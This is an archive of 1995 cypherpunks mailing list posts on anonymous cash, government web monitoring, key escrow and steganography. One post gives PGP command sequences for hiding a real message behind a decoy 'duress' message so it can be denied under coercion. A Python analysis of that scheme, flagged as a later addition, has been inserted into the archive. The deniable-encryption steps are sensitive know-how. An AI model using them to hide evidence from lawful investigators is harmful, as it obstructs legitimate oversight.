While these approaches are technically interesting, the political
implications are more ominous.  While Jakobsson labels the entity who has
the power to break the anonymity an "ombudsman", implying that he defends
the interests of the cash holder, he could equally well be called a
"policeman" because he is the one who catches the criminals.  It is all a
matter of how you look at it.

The question is whether these various threats of kidnapping, blackmail,
extortion, etc. are good enough reasons to go to a cash system where
privacy is protected only at the sufferance of government agencies.
There are plenty of precedents for governments misusing supposedly-
private information, such as the use of phone records to track down
those who resisted the German regime during World War II.  One of the
attractive aspects of electronic cash has been its immunity to this form
of governmental coercion.  The overwhelmingly negative response to the
Clipper chip proposal (other than in the cryptographic and law
enforcement communities) may apply to Clipper cash as well.

A related issue is the possible competition of rival cash systems.  As
with Clipper, where it would apparently be necessary to forbid the use of
alternatives, so with Clipper cash it would seem that people would prefer
true anonymity over conditional protection, even if you call the cash
tracer an "ombudsman".  So there would seem to be a need for governments
to criminalize the use of fully anonymous electronic cash in order to
force people to use the ones which the government could track.  Whether
this will even be possible in an increasingly global financial system
remains to be seen.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 13 Sep 95 11:33:00 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <199509131412.KAA26837@panix.com>
Message-ID: <Pine.D-G.3.91.950913141437.24669A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Duncan Frissell wrote:

> At 06:03 PM 9/12/95 -0400, Brian Davis wrote:
> 
> >Unbelievable!!!  To add to this distressing truth, I have learned that 
> >the White House also subscribes to a number of newspapers and periodicals 
> >which are reviewed for things of interest to the Administration and to 
> >the President. I I I I I I ammmmmmmmmm shocked!
> 
> The government, as you no doubt know, sometimes operates under different
> rules.  Thus when the "Red Squad" (Intelligence Division) of the New York
> City Police (located in that big building on the North side of Vandam
> between Greenwich and Houston BTW) was sued for maintaining files on "lawful
> protest groups" they entered into a consent agreement to refrain from this
> sort of thing.  Later, the courts said that this agreement meant that the
> cops couldn't even listen to WLIB radio (NYC's favorite radical
> African-American station) to find out in advance where rallies were going to be.
>
I am not familiar with this incident, but I note that state authorities, 
not federal, were involved according to your post.  Was the consent 
decree also filed in state court?  And even if it was in federal court, 
was the legal theory on which the plaintiffs proceeded based on NY state 
law or federal law??  
 
> Since the White House is doing this reading of sites with public funds and
> since that institution is the most powerful in the world --- it can nuke its
> enemies, for example --- people are naturally interested to discover if they
> are the subject of an investigation.
> 
The White House also reads publicly available newspapers and magazines (I 
assume).  How is accessing a Web site different from that?

> This is a demonstration of the unintended effect of electronic surveillance
> technology.  The fact is that it can do more harm to the authorities than to

Is the World Wide Web your idea of "electronic surveillance 
technology"??  I would agree that packet sniffing is a different problem, 
but accessing an open Web site seems reasonable to me.  Would you prefer 
that the staffers use home computers to do this (in an attempt to hide 
their tracks)?  As far as I know, this was all done openly and the Web 
site chose, right or wrong, to reveal the contents of their log files to 
someone.  Again, what about the complaints heard in this forum recently 
about law enforcement's obtaining similar log files from the Web site set 
up regarding the child's kidnapping?

> the public.  The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney
> King Video.  Since those in power are more interesting than ordinary people,
> they represent a more "target-rich environment."  Information about their
> activities has greater commercial value and is thus more likely to see the
> light of day.

Not only "those in power" but those in the public eye/public figures.  On 
that rationale, Phil Zimmermann is probably a public figure with respect 
to encryption ...


> DCF
> 
> "There are more of us than there are of you."
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
That, of course, depends on what you mean by "us" and "you."

EBD


Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Wed, 13 Sep 95 11:57:21 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509131857.OAA08914@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Thomas Grant Edwards <tedwards@Glue.umd.edu> wrote:
> The Religious Right brings their agenda to the public spotlight
> because they become incredibly involved in local politics on a
> nationwide basis and have the knowledge, means, and money to
> influence politics at this level.  Very few people who are outside
> the political process realize the amount of organization, dedication,
> and dollars required to achieve political validity.

This is a well made point, and I certainly do not claim to be one
of those who has an internal understanding of the political process.

I submit that the frenzied coverage of the presidential campaign
*severely reduces* the required knowledge, means and money, needed
to raise issues to the fore, and that furthermore, a lot of the "means
and money" that you mention are used for communication and organization.

Of course, an organized campaign on the Net is essentially free,
but for the cost in time.  It is my opinion that the political power
of the Net is just starting to awaken, and that a perception of
impotence in the political process, is just that - a perception.

David C. Lambert
dcl@panix.com
(finger for PGP public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFcpYKpplsfgM88VAQF8lgP8CViP3ggK68e5l6KGTqcI/2uHp0cP6z9t
a2etUdxH0QBuyWu3MVVsWuB+6n6QcRSO69rh0E/U5apzqJoPMdirbLt8B/cMdsAg
yY4vfEhGLZkuG5470uP9GKR6TF00YiZmfIoXtfDJPmbfcRwj018S1xe7myeGyLJm
ARpzGgrYR30=
=r3ff
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Wed, 13 Sep 95 05:03:23 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" and net monitoring
Message-ID: <199509131202.AA15294@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> From:          lindat@iquest.net (Linda Thompson, American Justice Federation)

> >    The  National  Security   Agency   presumably   can   monitor
> >subversive  communication  on  the  Internet  without leaving any
> >trace  by  "sniffing  packets"  at  traffic  nodes. 

Well they are just doing what their charter says they
should be doing - gathering information.

> >    It turns out that computers from inside the White House  have
> >kept  pretty  good  tabs  on information available on Whitewater,
> >Vince Foster, and Mena at a few key repositories  on  the  World-
> >Wide Web, a subset of the Internet.

I think that's because White House workers have access to the
net and of course they are surfing like all the rest of us
- they are just people, you know :-) If that were
part of some hard-level information gathering,
I assure you they would not leave such clear traces.

> >Office  of the President between August 28 and August 31.  If the
> >White House is showing a similar interest in other sites  on  the
> >World  Wide  Web,  that would amount to a monitoring operation of
> >considerable magnitude. 

So are you saying the White House by itself checked out those places,
or are you saying that *people* working inside the White House
happened to be interested in issues available on those sites and
accessed them?  And so what, it is public information when it
is on the WWW - isn't it?


> >    In light of this information, I have the following questions:
My guesses are

> >(1) Does this constitute "casual browsing" by White House staff, or
> >    is it, in light of the considerable time and effort spent during 
> >    regular business hours, part of a monitoring or intelligence operation?

Probably both 

> >(2) For what purpose is the information transferred to the White House used?

Probably to read it and maybe learn something from it :-)

> >(3) Does the White House keep information from these web sites on file,
> >    and does the White House keep a file on the persons responsible for
> >    these web sites?

Hell, I am keeping my own records, and on the other hand I am in the
process to get/buy/snatch/build a system where I could automatically
scan all the newsgroups with some kind of AI system and keep
an eye on certain FTP, GOPHER, WAIS, WWW and so on to keep
me better informed. This is partly because the information from the
Internet is getting out of proportion AND quite a big part of it
is just rubbish and wastes your time.

> >(4) Is the April 9 statement by David Lytel of the White House Office of
> >    Science and Technology to Amy Bauer of Copley News Service that the
> >    administration does not monitor anti-Clinton activity on the web still
> >    operative?

Probably they do and they really should. If I were Mr. Clinton (which
I luckily am not) I would want my adjutants to prepare a report for
me each morning summing up all the possible comments on the
subject of Clinton and the USA from the NET. That would be a very precious
source of feedback to fine-tune your acts. And that information
is real time.

Totally another thing, which somehow belongs to this subject:
should intelligence bodies watch the net?

I am in the middle of reading the Spycatcher book. Btw I don't understand
all the hype round it and I would say in that book there is
not enough substance to ban its printing in certain countries.

Anyway, again in that book it becomes clear that the
riskiest part of the agent, and therefore one of the best ways
to unveil them, is to concentrate on their communications
with the coordinators in that particular country or on
the communication directed to the country behind the operation.

So clearly to make agents more successful their communication
is the one needing new techniques - how about the Internet?
It is accessible almost everywhere and you can get an
account without giving your real identity. By using certain
sites you just call in from a telephone box, give a little information
or in some places none, and you are ready for almost
totally untraceable communication. I bet they are using
it already a lot to replace clumsy radio communication.

Don't get me wrong, I vote for freedom of speech (which is
getting slimmer), privacy (of which there is not much left),
no regulation on encryption (which is not going to be)
but I don't like these things used against my country's
security and to steal our intellectual property.

Based on this I tend to think every self respecting 
intelligence organization must have those taps 
otherwise they are not doing their job properly.

> "When even one American -- who has done nothing wrong -- is forced by fear
> to shut his mind and close his mouth, then all Americans are in peril."
> Harry Truman

Truman might have been one of the best presidents US ever had
but talk is talk and deeds are deeds.


Comments and reasoning are totally my own imagination;
my employer would probably disapprove of them and
they certainly don't represent my employer's
opinions.

Be careful out there ...

Best Regards
Kari Laine
Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 17:16:30 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" and net monitoring
Message-ID: <9509201551016603@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 13 Sep 95 11:18:14 -0400
From: hallam@w3.org


>> >(4) Is the April 9 statement by David Lytel of the White House Office of
>> >    Science and Technology to Amy Bauer of Copley News Service that the
>> >    administration does not monitor anti-Clinton activity on the web still
>> >    operative?

>Probably they do and they really should. If I were Mr. Clinton (which
>I luckily am not) I would want my adjutants to prepare a report for
>me each morning summing up all the possible comments on the
>subject of Clinton and the USA from the NET. That would be a very precious
>source of feedback to fine-tune your acts. And that information
>is real time.

Nope, they don't; the Democratic party aides do that type of work from Democrat
HQ.

The President gets a once a week summary of all the mail he gets including the
email.  I think they also provide a daily press digest.

By monitoring Lytel was probably thinking about installing net sniffers etc. or
obtaining the data from the FBI or whoever. I am certain he didn't mean to say
that he does not surf the net ever and does not occasionally visit opposition
sites.

The term monitor implies an organised search and continuous checking procedure;
the number of hits cited sounds more like someone passed round the URL of a kook
site inside the office.

        Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 12:26:55 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Can GAK be made "not interoperable" with PGP?
Message-ID: <199509131926.PAA14444@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 9/13/95 -0700, Timothy C. May wrote:

>But is this even possible, to make a GAK system "not interoperable" with,
>say, PGP?
>
>Unless the GAK system has some sort of entropy analyzer, and can recognize
>high-entropy sources which it presumes to be encrypted data (*), one can of
>course PGP-encrypt a text file and then GAK the resulting file.

I took it to mean that they were saying that an approved program on one end
of a communication exchange could not exchange encrypted messages or
establish an encrypted session of some kind with an unapproved program on
the other end.  Not trying to outlaw superencryption (PGP on both ends using
a GAKed channel) but GAK on one end working with an unapproved system on the
other end.  A ringer GAK-work-alike that would defeat the intent of GAK.

I don't know if the government can prevent that with a software-only system
or indeed if half a secure system can be made completely secure.

DCF

"Markets and open systems beat governments and closed systems."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 12:27:18 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <199509131926.PAA14458@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 AM 9/13/95 -0700, Timothy C. May wrote:

>While I have had some qualms about the name, on balance I think it has been
>good for us. After all, it's not as if _other_ groups don't already exist!
>In particular, the British branch of Cypherpunks disliked the name
>"Cypherpunks" so much that they used a different name for themselves, the
>"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
>whatever reasons. But the name may have been a factor, at least.

Note too that Brits differ from Americans.  "Wired" worked well here from
the beginning but has had problems there.  Differing national characteristics.

DCF

"Let's all just agree to disagree.  My system can thrive with widespread
disagreement among rabid individualists --- can yours?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 13 Sep 95 07:28:22 PDT
To: ab411@detroit.freenet.org
Subject: Re: Scientology tries to break PGP - and
Message-ID: <759.9509131426@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Why would they use your copy of the program to decrypt the file?
> They could just use a version that lacked this 'feature'.  Of
> course, they still couldn't get at the real plaintext unless you
> gave them the key, but you are right back to the same old standoff
> where they say, "Give us your key," and you (try to) say, "No."

I agree, you can't rely on them using your doctored program, it must
be resilient to them having a copy of all of your software, and their
own fresh copies of software, and a backup of each copy before
starting, and still provide plausible deniability.

Here's an idea to do just that, perhaps something which could be added
to a future PGP.

I reckon this is what you'd do:

% pgp -es duress
% pgp -es msg
% stealth < msg.pgp > msg.stl
% cat msg.stl >> duress.pgp
% pgp +makerandom=1234 noise
% cat noise >> duress.pgp
% pgp -a duress.pgp
% mail someone < duress.asc

The pgp +makerandom=<size> <file> is an undocumented feature of pgp >
2.6 (not sure exactly when it got added, Colin Plumb pointed it out
when I asked him about ran nos for stealth).

So what this means is that you are using PGP itself to hide a
stegoed message.  This would be good for the guy from FACTnet
(forgotten his name) who just got hit by the CoS, he could hold out
for a while, then give up his key, the duress message would appear,
and the real message would be explained by having a script to do this
on his HD, and having long since burned the disk with a script to do
the above on it:

% pgp -es msg
% pgp +makerandom=4567 noise
% cat noise >> msg.pgp
% pgp -a msg.pgp
% mail someone < msg.asc

ie the idea is that you pad your message to a fixed size for the
express purpose of hampering traffic analysis (of the type of my,
Alice did have a lot to say to Bob that day).  It would be even better
cover if the thing had gotten sent through a remailer, as this kind of
thing is expected of type I remailer traffic (before mixmaster which
does the packetizing for you).

So the duress message really looks like this:

+---------+---------------------------+--------------------+--------+
| pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise  |
+---------+---------------------------+--------------------+--------+

the IDEA block has a length field, but you can increase the length
without damage to include the following stealthed stuff as the
underlying stuff which is IDEA encrypted will know its length on
decryption, and the following junk will just be discarded.

So, Alice and her secret key ring (encrypted) gets nabbed by
Charlie (CoS?), and coerced into divulging her passphrase.

And if and when it is noticed that the message was longer than it
ought to be (CoS that smart? substitute the NSA and they'd notice for
sure), Alice explains away the junk on the end by pointing them to the
fact that all of her messages were exactly (say) 16k long, and that
she was using the noise-only script, and that the message really is
this:

+---------+---------------------------+-----------------------------+
| pgp hdr | IDEA encrypted duress msg | noise                       |
+---------+---------------------------+-----------------------------+

Having this built-in to PGP provides plausible deniability as you have
no extra software which might look incriminating unless you managed to
dispose of it first, if it comes as stock.  Even as a standalone it
would be feasible, but you'd need to be careful to hide the first
script, maybe on an encrypted drive or something.  This is not good
tho as you ideally want nothing left, just a standard pgp
implementation, and they have no way to prove anything, they can be
suspicious, but suspicion can't put you in jail, and if you say there
is no message, only random junk for padding purposes to foil traffic
analysis this would be plausible, especially if they really had
captured a whole load of 64k messages.

You really need to use stealth2 for that, as stealth1.x gives the game
away for determined attackers, but for stealth2, I need some
cryptographic opinions on whether this is secure:

	0 < x < N

N is RSA modulus, and converting that to a number x' in the range:

	0 < x' < 2^(int(log2(N) + 1) + 64)

(ie the next power of 2 over N multiplied by 2^64)

and the transformation supplied by:

	x' = N * f(MD5(x)) + x

where f(y) is a function which converts from range 0 <= y < 2^128 to a
range 0 <= f(y) < scale.  Scale some constant defined in terms of N,
and n other randomisation.

Is that safe?

x is random, and will be different even for a repeat encryption of the
same file, as PGP is using a random IDEA session key.

So are there any brute force attacks on that which would be cheaper
than attacking 128 bit IDEA?  PGP's random number generator also makes
extensive use of MD5, so I'm taking the use of MD5 as secure as a
given.

If it is thought to be dangerous for some reason (it is after all some
kind of signature on itself, presume that you know N, and x' but
not x, the question is can the equation be brute force reversed in a
less than 128 bit brute force attack.  I'm neglecting to consider the
rand() calls, which I'm not expecting to add security, but are just a
mechanism to stir the value with to get more random nos, as
occasionally the algorithm needs more than one, if the first fails,
etc.

The other approach, presuming that you can get to the data before they
can, is to use secure drive, and securely wipe (or physically destroy
- data on floppy) the encrypted key.  Then you can give your
passphrase without concern.  Could land you in trouble for destruction
of evidence or some such tho, so innocent, plausible deniability would
be better.

Adam
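
The check below is an added example, not code from the post or from the stealth program: it implements the mapping x' = N * f(MD5(x)) + x from the message above under an assumed definition of f and scale (the post leaves both open), and shows the test that anyone holding the public modulus N can run on a candidate value, next to a variant whose multiplier is drawn independently of x. The moduli are constructed stand-ins rather than RSA keys, all function names are hypothetical, and the rand() retry logic the post alludes to is not modelled.

```python
import hashlib
import random

EXTRA_BITS = 64  # the "+ 64" in the post's upper bound on x'


def scale_for(n: int) -> int:
    """Assumed 'scale': whole multiples of N that fit below 2^(bits(N)+64)."""
    return (1 << (n.bit_length() + EXTRA_BITS)) // n


def f_md5(x: int, n: int) -> int:
    """Assumed f: MD5 of x (fixed-width, big-endian) reduced into [0, scale)."""
    width = (n.bit_length() + 7) // 8
    digest = hashlib.md5(x.to_bytes(width, "big")).digest()
    return int.from_bytes(digest, "big") % scale_for(n)


def hide(x: int, n: int) -> int:
    """x' = N * f(MD5(x)) + x, as written in the post."""
    if not 0 < x < n:
        raise ValueError("x must satisfy 0 < x < N")
    return n * f_md5(x, n) + x


def hide_random(x: int, n: int, rng: random.Random) -> int:
    """Comparison variant: the multiplier is chosen independently of x."""
    if not 0 < x < n:
        raise ValueError("x must satisfy 0 < x < N")
    return n * rng.randrange(scale_for(n)) + x


def recover(x_prime: int, n: int) -> int:
    """The recipient only needs x' mod N to get the RSA value back."""
    return x_prime % n


def consistent_with(x_prime: int, n: int) -> bool:
    """Test open to anyone who knows N: does the multiplier equal f(MD5(x))?

    For a value unrelated to N this holds with probability about 1/scale,
    so a match ties the value to that modulus.
    """
    if not 0 < x_prime < n * scale_for(n):
        return False
    x = x_prime % n
    return x != 0 and x_prime // n == f_md5(x, n)


def top_bit_rate(values, width_bits: int) -> float:
    """Fraction of values whose most significant bit (at width_bits) is set."""
    return sum((v >> (width_bits - 1)) & 1 for v in values) / len(values)


# Constructed 512-bit stand-in moduli (not real RSA keys; the mapping only
# depends on the size of N, not on its factorisation).
N = (5 << 509) + 1
N_OTHER = (7 << 509) + 3


def demo(samples: int = 2000, seed: int = 1995) -> dict:
    # random.Random is used only to make the demonstration reproducible;
    # it is not a cryptographic generator.
    rng = random.Random(seed)
    xs = [rng.randrange(1, N) for _ in range(samples)]
    hidden = [hide(x, N) for x in xs]
    randomised = [hide_random(x, N, rng) for x in xs]
    return {
        "round_trip": all(recover(h, N) == x for h, x in zip(hidden, xs)),
        # Raw x < N is visibly non-uniform at the top bit; x' is not.
        "raw_top_bit": top_bit_rate(xs, N.bit_length()),
        "hidden_top_bit": top_bit_rate(hidden, N.bit_length() + EXTRA_BITS),
        # How many values the public-modulus test flags in each case.
        "md5_flagged": sum(consistent_with(h, N) for h in hidden),
        "md5_flagged_wrong_key": sum(consistent_with(h, N_OTHER) for h in hidden),
        "random_flagged": sum(consistent_with(r, N) for r in randomised),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

On the constructed sample the top-bit rate moves from about 0.2 for raw x to about 0.5 for x', every MD5-derived value is flagged for the matching modulus, and none is flagged for the unrelated modulus or for the random-multiplier variant.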





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Sep 95 15:28:19 PDT
To: cypherpunks@toad.com
Subject: Re: Can GAK be made "not interoperable" with PGP?
Message-ID: <199509132227.PAA03114@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell <frissell@panix.com>
> At 10:26 AM 9/13/95 -0700, Timothy C. May wrote:
> 
> >But is this even possible, to make a GAK system "not interoperable" with,
> >say, PGP?
> >
> >Unless the GAK system has some sort of entropy analyzer, and can recognize
> >high-entropy sources which it presumes to be encrypted data (*), one can of
> >course PGP-encrypt a text file and then GAK the resulting file.
> 
> I took it to mean that they were saying that an approved program on one end
> of a communication exchange could not exchange encrypted messages or
> establish an encrypted session of some kind with an unapproved program on
> the other end.  Not trying to outlaw superencryption (PGP on both ends using
> a GAKed channel) but GAK on one end working with an unapproved system on the
> other end.  A ringer GAK-work-alike that would defeat the intent of GAK.

Yes, I think this was the idea of the original "software key escrow"
proposal, from TIS as I recall.  The sender would encode the session key
with a government public key but there was some trick by which the
receiver would verify that the session key was in fact encoded correctly
and refuse to operate if it was wrong.  So any attempt to corrupt or
remove the LEAF would be detected if you were talking to a compliant
receiver.

That is part of why Matt Blaze's Clipper attacks were so significant,
because they went to the heart of this requirement.  It was always clear
that you could superencrypt with Clipper, but Matt found a way in which
you could send a LEAF which would be accepted by a regular Clipper phone
but which had bogus data for law enforcement.  So this defeated the
requirement of not interoperating with rogues.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 13 Sep 95 15:56:36 PDT
To: adam@bwh.harvard.edu
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <9509132252.AA20787@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> | Oh please!  Some clerk browses the internet and you don't want to respect
> | their privacy because of the IRS?  This makes sense how?  I suppose that
> | you're going to dig up information about me and spread it around the 
> | internet because you have issues about the company I work for?
> 
> 	First off, I was being somewhat sarcastic, as you might have
> noticed from several things, not the least of which was the phrase
> 'sarcasm aside.' 
> 
> 	That said, why should I respect the privacy of government
> employees?  There is a substantial difference between government and
> private companies, in that I am not compelled in any way to do
> business any private company.
> 
> Adam

Someone is making you let users at government sites browse your website?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 12:53:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Corporate Use of Anon WWW Proxies
Message-ID: <9509131953.AA19241@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[I pulled this from the firewalls list (use majordomo@greatcircle.com to join)]

Alex Eveleigh <Alex.Eveleigh@kellogg.com> writes:
> Subject: Monitoring Activity on the Internet
[...]
>      I would like to get some opinions on how easy it would be for someone 
>      to monitor what information is being accessed on the Internet by our 
>      company. For example how easy would it be for our competition to monitor 
>      all sites that people in our company are accessing and what 
>      information we are pulling off the Internet.

This struck me as rather ironic in the wake of The Govt. Could Be Reading
_Your_ Home Page. It also sparked me to draw the short connection between
industrial espionage (and simple industrial nosiness), and anonymous Web
proxies. An obvious point, really, but companies often have an interest in
concealing the nature/extent of their Web crawlings, too. Perhaps there's a
market niche, or a few pro-anonymity publicity points, here for someone.

-Futplex <futplex@pseudonym.com>
"Everybody's got something to hide except for me and my monkey" -J.L. & P.McC.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@europages.com
Date: Wed, 13 Sep 95 06:47:39 PDT
To: cypherpunks@toad.com
Subject: Majordomo results: (NOISE) Re: White House MONITORS Web Pag
Message-ID: <9509131453.AA14290@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


--

>>>> This is NOISE !
**** Command 'this' not recognized.
>>>> 
>>>> DAMION FURI writes:
**** Command 'damion' not recognized.
>>>> >         Maybe so, but we don't have to like it.  And I don't.  But
**** Command '>' not recognized.
>>>> >         it's not so much their access, per se, that I object to.
**** Command '>' not recognized.
>>>> 
>>>> Why the hell do you care ?  Someone has a home page for something on the Web.
**** Command 'why' not recognized.
>>>> Someone at the White House looks at it. So what ?  You object to the fact
**** Command 'someone' not recognized.
>>>> that somebody in the government has a Web browser and *gasp* uses it to read
**** Command 'that' not recognized.
>>>> stuff on the WWW ???
**** Command 'stuff' not recognized.
>>>>   
>>>> >	It's their potential intentions, 
**** Command '>' not recognized.
>>>> 
>>>> You take moral offense to what you think someone else _might_ be thinking ?  
**** Command 'you' not recognized.
>>>> Sounds like you believe in thoughtcrime. Banned any good books lately ?
**** Command 'sounds' not recognized.
>>>> 
>>>> > 	all things considered, and
**** Command '>' not recognized.
>>>> >         the fact that they aren't at all open about such monitoring.
**** Command '>' not recognized.
>>>> 
>>>> This is absurd. You expect the White House to issue a press release every time
**** Command 'this' not recognized.
>>>> a staffer clicks on a URL ?  
**** Command 'a' not recognized.
>>>> 
>>>> 	"WASHINGTON (UPI) The Clinton Administration unveiled plans today to
**** Command '"washington' not recognized.
>>>> 	add several new sites to the White House bookmarks list. At a hastily
**** Command 'add' not recognized.
>>>> 	arranged press briefing this morning, Defense Secretary William Perry 
**** Command 'arranged' not recognized.
>>>> 	told reporters that the changes would be implemented in close 
**** Command 'told' not recognized.
>>>> 	consultation with NATO allies. There was little immediate reaction 
**** Command 'consultation' not recognized.
>>>> 	from Capitol Hill. Members on both sides of the aisle said they 
**** Command 'from' not recognized.
>>>> 	needed time to study the proposal in detail."
**** Command 'needed' not recognized.
>>>> 
>>>> Someone please tell me this is just an extremely premature April Fool's joke...
**** Command 'someone' not recognized.
>>>> 
>>>> -Futplex <futplex@pseudonym.com>
END OF COMMANDS
**** Help for majordomo:

This is Brent Chapman's "Majordomo" mailing list manager, version 1.93. 

In the description below items contained in []'s are optional. When
providing the item, do not include the []'s around it.

It understands the following commands:

    subscribe <list> [<address>]
	Subscribe yourself (or <address> if specified) to the named <list>.

    unsubscribe <list> [<address>]
	Unsubscribe yourself (or <address> if specified) from the named <list>.

    get <list> <filename>
        Get a file related to <list>.

    index <list>
        Return an index of files you can "get" for <list>.

    which [<address>]
	Find out which lists you (or <address> if specified) are on.

    who <list>
	Find out who is on the named <list>.

    info <list>
	Retrieve the general introductory information for the named <list>.

    lists
	Show the lists served by this Majordomo server.

    help
	Retrieve this message.

    end
	Stop processing commands (useful if your mailer adds a signature).

Commands should be sent in the body of an email message to
"majordomo".

Commands in the "Subject:" line NOT processed.

If you have any questions or problems, please contact
"Majordomo-Owner".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 13:08:02 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Minor Risk to LSB Steganography
Message-ID: <9509132007.AA19945@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Last week I attended a lecture given by Dexter Kozen at Cornell, on 
"Efficient Algorithms for Optimal Transmission of Video Data". He
mentioned in passing a couple of approaches to choosing data that may 
acceptably be lost in the process (i.e. without excessive picture quality
degradation). One scheme (which I believe counts as a "corona method") 
involves simply discarding the LSBs of all the encoded pixels or whatnot. 
This method was not at all a focus of the talk. Anyway, I thought
I'd mention it as another minor potential threat to the use of LSB
steganography in video transmission, e.g. MPEG streams.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Sep 95 07:15:44 PDT
To: cypherpunks@toad.com
Subject: Dirty Jobs Ad
Message-ID: <199509131415.QAA00857@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, Sept 13, 1995. For the outawork:


C.I.A.'s Chief Calls Covert Action a Must

Washington, Sept. 12 -- The Central Intelligence Agency
will maintain, and perhaps increase, its covert
operations abroad and continue to hire informers from
terrorist cells, military regimes and drug syndicates,
the new Director of Central Intelligence said today.

The Director, John M. Deutch, called espionage "the core
mission of the Central Intelligence Agency." That mission
has been questioned by critics of the C.I.A. in Congress
and the foreign-policy establishment, who wonder whether
the rewards of secret information are worth the risks of
undertaking covert operations and recruiting murderous
and corrupt foreign agents.

-----


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott M Fabbri <m1smf99@FRB.GOV>
Date: Wed, 13 Sep 95 13:48:22 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
In-Reply-To: <199509131857.OAA08914@panix.com>
Message-ID: <9509132022.AA27925@arcss5.FRB.GOV>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 13 Sep 95 08:50:17 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
In-Reply-To: <Pine.A32.3.91.950913102622.32299A-100000@pangloss.ims.advantis.com>
Message-ID: <Pine.SOL.3.91.950913163953.25308J-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Henry W. Farkas wrote:
 
> If decrypted with the "alternate" or "fake" secret key, the encrypted file
> is wiped until it reaches a marker; the remainder of the file is
> displayed.  If you use your "primary" or "real key", the extraneous text
> is simply stripped.

Useless I'm afraid.  They have the source code and have disabled your
"feature" and attached loud alarm bells to it.

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Wed, 13 Sep 95 14:21:23 PDT
To: dcl@panix.com (David C. Lambert)
Subject: Re: An opportunity not to be missed
